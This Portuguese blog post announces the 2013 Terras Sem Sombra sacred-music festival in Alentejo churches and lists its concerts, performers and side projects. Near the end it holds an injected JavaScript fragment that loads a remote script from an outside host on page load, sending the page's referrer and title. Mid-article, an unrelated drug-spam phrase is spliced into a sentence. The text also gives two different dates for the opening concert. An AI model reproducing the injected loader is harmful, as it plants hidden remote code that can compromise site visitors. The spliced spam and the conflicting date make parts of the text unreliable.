FestivalLateralNotícia

Um Alentejo que se promove pela música

A 9.ª edição do Festival Terras Sem Sombra arranca no dia 13, em Almodôvar, com concertos agendados até Julho em algumas das mais importantes igrejas da Diocese de Beja.


“Sem economia não há pessoas e sem pessoas não há património, pelo que é nosso dever estar na primeira linha do combate à desertificação do interior”

 

O maior festival de música sacra português está de regresso ao Alentejo. Com início este sábado, na igreja de Santo Ildefonso, matriz de Almodôvar, o programa do Festival Terras Sem Sombra (FTSS) para 2013, hoje apresentado no CCB, revela a supremacia dos notáveis intérpretes que tornarão os monumentos religiosos do Baixo Alentejo, já bem conhecidas pela riqueza artística e acústica, um palco privilegiado para escutar obras-primas de Mozart, Pergolesi, Machaut, Haydn, Schönberg, Takemitsu e Ligeti, entre outros.

Do leque diversificado de intérpretes, figuras maiores no universo da grande música fazem parte o agrupamento italiano laReverdie, o ensemble francês de Pierre Hamon ou o Cuarteto Casals, o mais celebrado quarteto de cordas espanhol. Do país vizinho, virá igualmente a Camerata Boccherini, de Massimo Spadano, que tem vindo a brilhar nos principais palcos europeus. Donato Renzetti e Giovanni Andreoli, famosos pela sua acção como maestros, à frente da Chicago Opera House e da Arena de Verona, respectivamente, são outros destaques da presente edição, a par de protagonistas do meio artístico português, como o tenor Mário João Alves e o barítono Luís Rodrigues.

Traçando um percurso da Idade Média à contemporaneidade, o Terras sem Sombra adopta como tema-chave de 2013, a polifonia. Algo que assume um significado muito especial para a região, numa altura em que o cante alentejano retomou a sua candidatura a Património Cultural Imaterial da Humanidade. Como salienta o director artístico do Festival, Paolo Pinamonti, “o cante destaca-se como uma das mais importantes formas de polifonia vocais, por ter sido um dos precursores do seu género.” Para os mais curiosos, o musicólogo Rui Vieira Nery, da Universidade de Évora, aprofundará o mesmo tema no dia 18 de Maio, na conferência temática inserida no programa deste ano.

Esta viagem cultural, que passa também por Santiago do Cacém, Grândola, Vila de Frades, Beja, Castro Verde, Carvalhal e Sines, ao associar de forma directa a música ao património da região, traz outro fôlego a igrejas notáveis mas que, em tempos de dificuldades, clamam pela sua preservação. “Queremos despertar novos olhares e novas vivências em torno da música sacra, dando vida a este extraordinário legado religioso, que vibra com intensidade entre nós“, explica José António Falcão, director do Departamento do Património Histórico e Artístico da Diocese de Beja, o promotor da iniciativa. Para tal, estabeleceu uma rede de parcerias com o turismo, autarquias, misericórdias, paróquias e empresas da região. Ao Teatro Nacional de São Carlos, entidade co-produtora do FTSS, cabe também papel de realce, através da presença do seu Coro e da Orquestra Sinfónica Portuguesa.

Uma novidade de 2013 será a abertura à vertente pedagógica da música como factor de inclusão: meio milhar de crianças, dos 3 aos 10 anos, das escolas de Melides, Carvalhal e Comporta, integradas nos agrupamentos de Grândola e Alcácer do Sal, estão a corresponder, durante este ano lectivo, ao desafio que o Festival lhes lançou para um programa lectivo com abrangência nas áreas das artes e da educação ambiental. O projecto centra-se no musical O Principezinho, de Victor Palma, adaptação da obra de Saint-Exupéry, e conta com o empenhamento da Fundação Herdade da Comporta e dos dois municípios abrangidos. Terá a apresentação final num dos concertos do FTSS, no dia 29 de Junho, no Carvalhal. Os actores e os figurantes serão os alunos locais, dirigidos pelo maestro Nuno Lopes, do Teatro de São Carlos, e acompanhados cefadroxil 500 mg pelo Coro Juvenil de Lisboa. A direcção coreográfica é de María Luisa Carles, da Companhia Nacional de Bailado. Pela primeira vez, o Festival extravasa a geografia da Diocese de Beja (Alcácer faz parte da Arquidiocese de Évora).

Este é, como se vê, um festival com causas. À semelhança de anos anteriores, o domingo seguinte a cada concerto será dedicado a acções de defesa da natureza e biodiversidade locais, juntando artistas, espectadores e residentes em torno da preservação da paisagem e dos recursos naturais da região. Por iniciativa da UNESCO, este ano celebra-se o Ano Internacional de Cooperação pela Água, e o TSS vai consagrar especial atenção à salvaguarda dos recursos aquáticos e à sustentabilidade dos recursos biodiversos que dependem desse património fundamental. Da frente atlântica à bacia do Guadiana e à transumância na área do Alto Sado, serão focados actividades e sítios estratégicos da relação homem/natureza. Um conjunto de acções que conta com o envolvimento do Instituto de Conservação da Natureza e das Florestas e de associações locais.

Outro aspecto importante do ADN do Terras sem Sombra diz respeito à sua vocação para dar a conhecer os produtos regionais de excelência, como o vinho, a cortiça, o mel, o azeite, a carne, o peixe, o café, o pão, a fruta, a doçaria e o artesanato. Estes e os demais recursos económicos e sociais do território contarão, ao longo da temporada, com acções promocionais específicas. Terçar armas por um desenvolvimento equilibrado e sustentável do Alentejo constitui o repto lançado à vasta comunidade do Festival. “Sem economia não há pessoas e sem pessoas não há património, pelo que é nosso dever estar na primeira linha do combate à desertificação do interior”, referiu José António Falcão durante a apresentação no CCB.

O Prémio Internacional Terras sem Sombra, que todos os anos distingue três personalidades ou instituições que se destacaram nas áreas da música, do património e da biodiversidade, tem este ano como patrona a infanta D. Pilar de Borbón, Duquesa de Badajoz, irmã do rei D. Juan Carlos I de Espanha, que virá presidir à cerimónia da sua entrega, na Comporta, no dia 6 de Julho. É um sinal da forte ligação do Festival a Espanha, que constitui o País Convidado do TSS em 2013.

 

Almodôvar, palco do concerto inaugural

A igreja matriz de Santo Ildefonso, peça de referência da arquitectura maneirista portuguesa, veste-se a preceito para receber, a 13 de Julho, a partir das 21h30, o concerto de abertura, intitulado Arquitecturas do Espírito. Um programa dedicado a Mozart, Takemitsu e Pergolesi – em que avulta o insuperável Stabat Mater deste compositor napolitano – e interpretado pela soprano Raquel Alão, pela mezzosoprano Marifé Nogales e pela orquestra de cordas Concerto Moderno, sob a batuta de César Viana.

No dia seguinte pelas 10h30, dando continuidade à acção principiada pelo Festival em 2011 e 2012, músicos e membros da comunidade local trabalharão, ombro a ombro, na preservação da Ribeira do Vascão, recentemente classificada como Sítio RAMSAR – Zona Húmida de Importância Internacional. A iniciativa visa dinamizar a conservação dos ecossistemas ribeirinhos deste importante afluente do Guadiana, mas incidirá também nos recursos silvestres da bacia do Mediterrâneo, entre eles o mel e as plantas aromáticas e medicinais, sustentáculo da economia rural que renasce nesta zona serrana, transição do Alentejo e do Algarve.

 

Programa


– Dia 13 ABRIL [21h30] – ARQUITECTURAS DO ESPÍRITO

Almodôvar, Igreja Matriz de Santo Ildefonso
W. AMADEUS MOZART, TORU TAKEMITSU, PERGOLESI
Soprano Raquel Alão
Alto Marifé Nogales
Direcção Musical César Viana
Concerto Moderno


– Dia 20 ABRIL [21h30] – PELA VIA LÁCTEA
Santiago do Cacém, Igreja Matriz de Santiago Maior
PEDRO DE ESCOBAR, GUILLAUME DUFAY

LaReverdie
Voz, alaúde Claudia Caffagni
Voz, violeta, flautas Livia Caffagni
Voz, violeta Elisabetta de Mircovich
Voz, cornetto muto Doron David Sherwin
Voz Elena Bertuzzi
Voz, órgão positivo Cristina Calzolari
Voz Elena Carzaniga
Voz Roberto Spremulli
Voz Andrea Favari
Voz, harpa Matteo Zenatti
Violeta Claudia Pasetto


– Dia 4 MAIO [21h30] – ARS NOVA: POESIA MUSICADA E MÚSICA POÉTICA
Grândola, Igreja Matriz de Nossa Senhora da Assunção
GUILLAUME DE MACHAUT
Le Poème Harmonique
Voz Marc Mauillon
Voz e viola de arco Vivabiancaluna Biffi
Alaúde Michaël Grébil
Flautas medievais e direcção musical Pierre Hamon


– Dia 18 MAIO [17h00]
Uma história do contraponto: do Gótico às Vanguardas
Beja, Igreja de Nossa Senhora dos Prazeres
Conferência por Rui Vieira Nery (Universidade de Évora)


– Dia 01 JUNHO [21h30] – AXIS MUNDI

Vila de Frades (Vidigueira), Igreja Matriz de São Cucufate
FRANZ JOSEPH HAYDN
Simon, um camponês (baixo) Luís Rodrigues
Hanne, sua filha (soprano) Carmen Romeu
Lukas, um jovem camponês (tenor) Mário João Alves
Orquestra Sinfónica Portuguesa
Coro do Teatro Nacional de São Carlos
Director do coro Giovanni Andreoli
Direcção musical Donato Renzetti
* Co-produção com o Teatro Nacional de São Carlos


– Dia 22 JUNHO [21h30] – SINAIS DE FOGO

Castro Verde, Basílica Real de Nossa Senhora da Conceição
G. LIGETI, F. JOSEPH HAYDN, A. SCHÖENBERG
Cuarteto Casals
Violinos Vera Martinez e Abel Tomàs
Violeta Jonathan Brown
Violoncelo Arnau Tomàs
Voz recitante Jorge Rodrigues
Coro Terras Sem Sombra
Maestro do coro Giovanni Andreoli


– Dia 29 JUNHO [18h30] – CONCERTO PARA CRIANÇAS: O PRINCIPEZINHO

Carvalhal, Grândola
Adaptação da obra de Antoine de Saint-Exupéry > VICTOR PALMA
Autor Ricardo Botelho
Principezinho Gustavo Pais
Rei Tomás Monteiro
Vaidoso João Castelo-Castelo
Bêbedo Tomás Crawford Nascimento
Homem de negócios Yoann Auboyneau
Acendedor Marta Martins Coelho
Geógrafo Mariana Martins Coelho
Serpente Cátia Santos
Raposa Constança Bettencourt
Narradores Cristina Navarro, Luís Macieira de Barros
Coro Juvenil de Lisboa
Ensemble do Coro Juvenil de Lisboa
Guitarra Victor Palma
Contrabaixo Pedro Sousa
Percussão Hugo Lopes
Piano e direcção musical Nuno Margarido Lopes
Encenação e movimento Maria Luisa Carles


– Dia 13 JULHO [21h30] – NA MÃO DE DEUS
Sines, Igreja Matriz do Santíssimo Salvador
ARNOLD SCHÖENBERG, LUIGI BOCCHERINI

Soprano María José Moreno
Camerata Boccherini
Violinos Massimo Spadano e Ludwig Durichen
Violeta Luigi Mazzucato
Violoncelo David Etheve
Contrabaixo Tod Williamson


Saiba mais, acessando:

http://festivalterrassemsombra.org

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.